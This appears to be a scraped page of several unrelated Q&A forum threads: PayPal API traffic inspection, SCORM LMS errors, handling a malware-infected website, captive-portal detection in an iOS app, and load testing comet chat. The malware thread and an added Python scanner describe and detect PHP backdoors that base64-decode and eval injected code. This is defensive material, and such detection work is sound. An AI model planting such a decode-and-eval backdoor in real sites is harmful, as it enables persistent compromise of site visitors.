View API data with Chrome DevTools

I am working on a site that uses the PayPal API. This new site will replace the old site at my job. As of right now, I need to check what data the old site sent to the PayPal API. Is there a way to check what data is being sent to and from a different site or API? It is data that is not typed in by the user, but data that already exists in the database that is being sent to the API.
Any help or advice would be great.
Thank you!

It "depends". On Windows platform you could use:
Fiddler or;
Microsoft Message Analyzer
to inspect traffic i/o (on the client system where either tool is installed). I'm sure other platforms will have similar tools.
Chrome Dev (or any other browser) tool will help with browser based traffic.
IMHO, depending on how "old" the existing system is, it may be worth looking at the API again to see if any newer features are worth the effort since you're updating things...and seems to me getting paid/payments systems/ops would be something high on the priority list :)
Hth...

Related

ERROR – unable to acquire LMS API, content may not play properly and results may not be recorded. Please contact technical support

We are in the process of implementing Success Factors LMS, and trying to play and view SCORM compatible files exported from Adobe Captivate 8 and 9 in Success Factors LMS.
I get the message - 'ERROR – unable to acquire LMS API, content may not play properly and results may not be recorded. Please contact technical support'
I have tried SCORM versions 1.2 v3 and 2004 V2 and V4. We can view the content, however it does not track, show as complete etc.
We are also producing SCORM-compliant files using Skillcast and Articulate, but we still hit the same issue: we can view the content after closing the API error window, but it still does not track.
Anyone experienced this problem before? Or know of a fix?
Many thanks
Normally this issue comes up when the course is unable to get the SCORM API from the LMS...I have seen a ton of SCORM content running in Success Factors before, so I wonder if the issue is in the setup. Are you seeing any "Access Denied" type errors in the browser element inspector/developer tools? I wonder if the course just cannot find/have access to the player window. If the course is launching in a new window, you may want to try launching it in the frameset. I have seen folks get around this issue by making sure the player and SCO are in the same window...
If you wanted to rule out the content being the issue, you can always test your content in the SCORM Cloud's free sandbox (https://cloud.scorm.com) to make sure the course is properly asking for the API...
If you have any other questions, we would be happy to help...you can just shoot us an email at support#scorm.com.
Thank you!
Joe
The error occurs because the content is not speaking to the Learning Management System (LMS). The code that runs to initialize the session doesn't happen. There is no return "ping" from the LMS.
You will get this error when you publish in SCORM and run from your desktop, or from a web server that isn't connected to an LMS. If it occurs when you are launching from an LMS it can either mean that the SCORM API isn't configured correctly, or your content server is on a different domain (cross-domain) than your application servers.
To test, you should try launching your content in different browsers. Our system was configured in such a way that Firefox and Chrome read our content as a cross-domain issue, and threw the SCORM API error, but Internet Explorer worked just fine.
In the end, it was determined that our server configuration in tandem with our firewall and security settings read the Content server as cross-domain and we had to redeploy our content servers within the firewall.

How do I go about safely taking a screenshot of a website that I know is infected with malware?

Background:
One of my clients' websites has become a malware infested hotbed.
Disposing of the malware has proven difficult and time consuming, and, in the meantime, we still have had to do work on the site.
For now, we went to some trouble to do our work - creating a disposable VM to just run a web browser, so we can see what the site looks like for the designers' work, for example.
I'm wondering if there's an easier (and faster) way to get an idea what the design of the site looks like. Not everyone on the project is tech savvy enough to be trusted with, for example, properly handling switching VMs.
Question:
Is there a method for safely seeing what a malware infested website looks like (for example, a service which will browse the site for me and send a screenshot), one which ideally is easy and simple enough to use that I can trust our non-tech-savvy designers to use?
You might take a look at Internet Archive: Wayback Machine to see if the site has been archived.
If a screenshot is all you need, there are several online browser simulators, such as Net Renderer (which will run any inputted web URL in a given version of Internet Explorer and then supply a screenshot). You might also try BrowserStack, which requires an account, and is not free, but does have a free trial period, and offers more than Internet Exploder.
You could also try running a browser in Sandboxie, which is simpler to set up and use than a VM (you just install it, and then use the Windows right-click menu to launch any program in a sandbox of your choosing). However, it isn't free for commercial use.
I don't know if there exists a standalone tool to parse a website for malware, but I think this can help you: it's a Google tool that you can use with a request, and they will send you a response.
Follow the link:
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328
Hope it helped.

Malware on the site as per Google but I cannot find it

Yesterday when I came to one of my sites I got a warning from Google that there is malware on my site. I looked at the code and there was indeed some JavaScript that shouldn't be there. I googled it and didn't find anything useful. When I came back to my site, that code was gone, but Google (when accessing the site from the search engine) and Google Chrome still give me a warning that there is malware on my site.
I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
Deactivate plugins that are not highly ranked or from a reputed source.
Use secure protocols. Check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes it via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it, look at the log and search for suspicious requests (e.g. a single POST request transmitting a base64 string is a very suspicious one).
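The log search and file hunt suggested in the answer above, sketched as an added example (not part of the original answer). It assumes Apache/nginx Combined Log Format, which does not record POST bodies, so it flags scripts that are only ever POSTed to and only rarely; the thresholds, paths and sample lines are constructed.

```python
import re
from collections import defaultdict

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+')
# A long run of base64 alphabet in the query string (length threshold is an assumption).
B64_RUN = re.compile(r'[A-Za-z0-9+/]{80,}={0,2}')
# PHP that decodes a string and executes it, as the answer describes.
EVAL_DECODE = re.compile(r'eval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(', re.I)

def suspicious_requests(lines, max_hits=2):
    """Return {path: [reasons]} for scripts that behave like a re-infection endpoint."""
    methods = defaultdict(list)   # path -> every method seen for it
    reasons = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        method, target = m.groups()
        path, _, query = target.partition("?")
        methods[path].append(method)
        if B64_RUN.search(query):
            reasons[path].add("base64-like query string")
    for path, seen in methods.items():
        # A .php file that is never fetched with GET and is POSTed to only
        # once or twice does not look like a normal page or form handler.
        if path.endswith(".php") and set(seen) == {"POST"} and len(seen) <= max_hits:
            reasons[path].add("rare POST-only script")
    return {p: sorted(r) for p, r in reasons.items()}

def looks_like_dropper(php_source):
    """True if PHP source contains the decode-then-eval pattern."""
    return bool(EVAL_DECODE.search(php_source))

# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /products/ HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2012:13:55:38 +0000] "GET /kontakt.php HTTP/1.1" 200 2210',
    '203.0.113.5 - - [10/Oct/2012:13:55:40 +0000] "POST /kontakt.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [10/Oct/2012:03:12:01 +0000] "POST /images/cache_x.php HTTP/1.1" 200 12',
    '198.51.100.7 - - [10/Oct/2012:03:12:09 +0000] "GET /t.php?c=' + "QUJD" * 30 + ' HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for path, why in suspicious_requests(SAMPLE_LOG).items():
        print(path, why)
```

Paths flagged in the log are candidates to open and check with `looks_like_dropper`; a legitimate contact form that is fetched with GET before being POSTed to is not flagged.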
Most probably your hosting has been compromised (password stolen) by an automated tool.
These tools typically inject some JavaScript inside JS files in order to infect the people visiting your pages with malware. You should:
Change your passwords.
Restore the most recent non compromised backup.

Wireless Authentication Page iOS app

I'm not really sure how to word this exactly, so hopefully someone can make sense of it. I've been working on an iPad app that syncs files from a server to your iPad and lets you build presentations with the various files. The corporation I'm working with on this app has a wireless network that requires you to re-authenticate every hour. So every hour instead of getting the expected JSON API response, any HTTP request pulls down the page needed to reauth with the wireless network. I was wondering if there is a specific HTTP response code related to getting sent that page or a "best-practice" way of testing for that page as opposed to JSON.
Granted I could just test to see if the response is HTML, but that doesn't account for other redirect responses that I haven't found yet. I could just test part of the HTML to see if it matches a predetermined portion of the html, but I'm an outside contractor. I can't guarantee they won't change the markup or verbiage of the page after I've made my deliverable.
So does anyone out in the ether know a "best practices" methodology for testing if the app needs to reauth before syncing?
I noticed that on Mac OS X and maybe even iOS, when you connect to a new Wi-Fi network, it will try to contact www.apple.com. This is being done to check if the internet connectivity is available. If it's not available, the Captive Network Assistant will pop-up, showing you the authentication page, or sometimes when I'm in Starbucks, an advertisement.
Following your question, since Apple themselves are doing it this way, I think you could check for the HTTP response code, look for something in the HTML markup (slightly discouraged though) or try to connect to a known server (Reachability).
For a corporation practicing well-documented projects, I am quite sure they won't be changing things without making sure that your app, once deployed will continue to work.
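One way to test for the re-authentication page without depending on its markup, as an added example that is not part of the original question or answer: validate what a genuine API reply must look like and treat anything else as intercepted. The `sentinel` key, host names and sample responses are hypothetical.

```python
import json
from urllib.parse import urlsplit

def classify_response(request_url, status, headers, body, sentinel="api_version"):
    """Classify an HTTP exchange as 'ok', 'intercepted' or 'api_error'.

    `sentinel` is a hypothetical top-level key that the real API is
    assumed to include in every JSON reply.
    """
    headers = {k.lower(): v for k, v in headers.items()}
    api_host = urlsplit(request_url).hostname
    # A redirect, especially to another host, means something on the
    # network path answered in place of the API.
    location = headers.get("location")
    if location and urlsplit(location).hostname not in (None, api_host):
        return "intercepted"
    if 300 <= status < 400:
        return "intercepted"
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        # A portal usually answers 200 with HTML; a 5xx HTML page is more
        # likely the real server failing.
        return "intercepted" if status < 500 else "api_error"
    try:
        doc = json.loads(body)
    except ValueError:
        return "intercepted"
    if not isinstance(doc, dict) or sentinel not in doc:
        return "intercepted"
    return "ok" if status < 400 else "api_error"

if __name__ == "__main__":
    # Constructed responses: a genuine reply and a portal page served with 200.
    url = "https://api.example.com/files"
    print(classify_response(url, 200, {"Content-Type": "application/json"},
                            '{"api_version": 2, "files": []}'))
    print(classify_response(url, 200, {"Content-Type": "text/html"},
                            "<html><body>Please sign in</body></html>"))
```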

Load testing comet based application

We have developed a comet based application for chat (using streaming approach). The application has been developed in ASP .Net 3.5 sp1.
The browser has two connections with the server. One for posting and another for receiving chat messages. While load testing with JMeter or VSTS the posting is getting recorded and load tested but not the receiving portion. Can someone please suggest any load testing tool which can address this issue?
I've come across the same problem; the top runner for me at the moment is browsermob.com. It has a complete API that allows you to create test scenarios that can "watch and wait" on pages recording every HTTP request made as though they are visiting through a real browser. It gets kind of expensive if you need to test with more than 25 concurrent users (browser users), but seems very reasonably priced from what I have seen so far.
It'd be really interesting to see what tools others who are somewhat technically inept are using.
http://docs.codehaus.org/display/JETTY/Stress+Testing+Cometd